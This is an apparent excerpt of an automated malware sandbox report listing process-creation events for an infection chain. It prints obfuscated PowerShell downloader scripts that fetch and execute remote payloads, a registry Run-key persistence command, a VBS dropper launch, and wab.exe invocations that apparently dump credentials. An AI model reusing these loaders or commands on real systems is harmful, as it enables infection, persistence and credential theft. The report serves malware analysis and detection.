              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ypvrsbyzkda"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jrikttjaylsubj"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tlouumuumtkhdxgwj"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
              Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$antigyrous='s';$antigyrous+='ubs';$antigyrous+='tri';$disseizure = 1;$antigyrous+='ng';function sortkridtstegningens($udlossende){$makah=$udlossende.length-$disseizure;for($vaesentligheden206=5;$vaesentligheden206 -lt $makah;$vaesentligheden206+=6){$vrdiomraades+=$udlossende.$antigyrous.invoke( $vaesentligheden206, $disseizure);}$vrdiomraades;}function caprellidae($kondenseret){ & ($fligene) ($kondenseret);}$festdragtens=sortkridtstegningens ' s.ovmfo,klobeathzbelavi overlfaciolvictramictu/kphje5krlha.osteo0 prin sove( tiltwlnfreina.osnteg sdwatero,etatwvaskosregis trounswigstinges retsa1intel0 aspe. anal0 c oc;p.aya disshwdolicila gbnf,ktu6trska4 g.nz;an ui omkamxh tto6forha4 fine;hvidg ring rflaskvbakka: uden1pyroc2 unmo1anili.stil.0 t,ks) dy.t aendrg guldewavescic,erkadonio el.f/ scri2kaily0signa1beb,u0apnea0ne,tu1headw0tre s1freml treadfrecoiijargorapnoeesnorkfwhiffoleysex bioe/aspar1fetic2pseu.1udstt. tope0snic, ';$lrredskjolernes=sortkridtstegningens ' scleuspn.msrepedeene gr mell-undreafluidgfors.eandennsupert brav ';$hypermnesia=sortkridtstegningens 'semiahslangtloosstlage.p pnhe:xwfin/dummk/polym1 c,pt9thges4elect.inval5repet9 eksa. mugg3ligro0 thom.bevge6gulli/m.nkeu sagrntr lacink,tobeanfmaarsaisandsclaiba.landgmbombedfingepforly ';$aktiveret=sortkridtstegningens 'freqe>fredn ';$fligene=sortkridtstegningens ' molyi forhetopsax pers ';$opvarmningsmssige='mongolisms';$haandvrksbagere = sortkridtstegningens 'medicefibe c escah smleodomin paste% unp.a demepchelipdecardsubfla unactsu.liaundon%,rmme\teksti selvnindigd droniudsvistyknipbraknoonestsrenteeskibsddeempnkog.iegennesdyingsth mu. a,svaempris rings emu, peng&skyfo&pusli steereaflvncth.nahskeleosideo alb.mtaftvt ';caprellidae (sortkridtstegningens 'sekst$lagergdecimlspectoasem beftera,usiolflam :worthrdoms,uknle ia solnpleathcivilosnedkbkaroletyndsngrasssconch= arve(bloodcraidemsydyedstrkk pik p/fjortcperco appre$dial,hkuardaa.olia lv,an.hyrod,igtov joshrobtaik fjersfi.msbst rtaconsugbe evegryderungdoemixyp)umb.l ');caprellidae (sortkridtstegningens 'opmun$spildgstilllscienospilob nkomavent lhksun:nondigresoryhellirgglero honosou,pucsvkk ocommep berei smudc ,ini=pyr o$sy,tahunpraypluc p,uracesynedrberigmae opneryt eangolsbothiiskefua domf.e.gotsbede.psjofels.ndiijo.rnthydro(prokl$ afleaamts.kblomsterodeiatonav torenonscr atsaefor ktcon e)oscil ');$hypermnesia=$gyroscopic[0];$charcia= (sortkridtstegningens ' most$mislig whirls,geeohaandb,olicaz.omelboard:m elfscard.kudarmir.ssof fugetimpreeunanntsinca1 b ll4noedv=v rbonundereprojiwsyste-pumpeobaro.bklassjhumaneforurcnoncrtel ct sangvs vriky diststh.wlt,ndstefilodmkvali.,odern exhae sk,btpleur.o,erpwun.enepaaklbinvercendomlamblyidrillegellynuvet,t');$charcia+=$ruinhobens[1];caprellidae ($charcia);caprellidae (sortkridtstegningens ' s,ri$ansa.starikkb.njoisk rpfrealitkartvevariet dove1puggi4nonve. ph lhsag,regenteac erudndlidest.n
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$antigyrous='s';$antigyrous+='ubs';$antigyrous+='tri';$disseizure = 1;$antigyrous+='ng';function sortkridtstegningens($udlossende){$makah=$udlossende.length-$disseizure;for($vaesentligheden206=5;$vaesentligheden206 -lt $makah;$vaesentligheden206+=6){$vrdiomraades+=$udlossende.$antigyrous.invoke( $vaesentligheden206, $disseizure);}$vrdiomraades;}function caprellidae($kondenseret){ & ($fligene) ($kondenseret);}$festdragtens=sortkridtstegningens ' s.ovmfo,klobeathzbelavi overlfaciolvictramictu/kphje5krlha.osteo0 prin sove( tiltwlnfreina.osnteg sdwatero,etatwvaskosregis trounswigstinges retsa1intel0 aspe. anal0 c oc;p.aya disshwdolicila gbnf,ktu6trska4 g.nz;an ui omkamxh tto6forha4 fine;hvidg ring rflaskvbakka: uden1pyroc2 unmo1anili.stil.0 t,ks) dy.t aendrg guldewavescic,erkadonio el.f/ scri2kaily0signa1beb,u0apnea0ne,tu1headw0tre s1freml treadfrecoiijargorapnoeesnorkfwhiffoleysex bioe/aspar1fetic2pseu.1udstt. tope0snic, ';$lrredskjolernes=sortkridtstegningens ' scleuspn.msrepedeene gr mell-undreafluidgfors.eandennsupert brav ';$hypermnesia=sortkridtstegningens 'semiahslangtloosstlage.p pnhe:xwfin/dummk/polym1 c,pt9thges4elect.inval5repet9 eksa. mugg3ligro0 thom.bevge6gulli/m.nkeu sagrntr lacink,tobeanfmaarsaisandsclaiba.landgmbombedfingepforly ';$aktiveret=sortkridtstegningens 'freqe>fredn ';$fligene=sortkridtstegningens ' molyi forhetopsax pers ';$opvarmningsmssige='mongolisms';$haandvrksbagere = sortkridtstegningens 'medicefibe c escah smleodomin paste% unp.a demepchelipdecardsubfla unactsu.liaundon%,rmme\teksti selvnindigd droniudsvistyknipbraknoonestsrenteeskibsddeempnkog.iegennesdyingsth mu. a,svaempris rings emu, peng&skyfo&pusli steereaflvncth.nahskeleosideo alb.mtaftvt ';caprellidae (sortkridtstegningens 'sekst$lagergdecimlspectoasem beftera,usiolflam :worthrdoms,uknle ia solnpleathcivilosnedkbkaroletyndsngrasssconch= arve(bloodcraidemsydyedstrkk pik p/fjortcperco appre$dial,hkuardaa.olia lv,an.hyrod,igtov joshrobtaik fjersfi.msbst rtaconsugbe evegryderungdoemixyp)umb.l ');caprellidae (sortkridtstegningens 'opmun$spildgstilllscienospilob nkomavent lhksun:nondigresoryhellirgglero honosou,pucsvkk ocommep berei smudc ,ini=pyr o$sy,tahunpraypluc p,uracesynedrberigmae opneryt eangolsbothiiskefua domf.e.gotsbede.psjofels.ndiijo.rnthydro(prokl$ afleaamts.kblomsterodeiatonav torenonscr atsaefor ktcon e)oscil ');$hypermnesia=$gyroscopic[0];$charcia= (sortkridtstegningens ' most$mislig whirls,geeohaandb,olicaz.omelboard:m elfscard.kudarmir.ssof fugetimpreeunanntsinca1 b ll4noedv=v rbonundereprojiwsyste-pumpeobaro.bklassjhumaneforurcnoncrtel ct sangvs vriky diststh.wlt,ndstefilodmkvali.,odern exhae sk,btpleur.o,erpwun.enepaaklbinvercendomlamblyidrillegellynuvet,t');$charcia+=$ruinhobens[1];caprellidae ($charcia);caprellidae (sortkridtstegningens ' s,ri$ansa.starikkb.njoisk rpfrealitkartvevariet dove1puggi4nonve. ph lhsag,
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "argumentlistens" /t reg_expand_sz /d "%semicomic% -w 1 $affektationernes=(get-itemproperty -path 'hkcu:\agenetic76\').tautologiske178;%semicomic% ($affektationernes)"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u 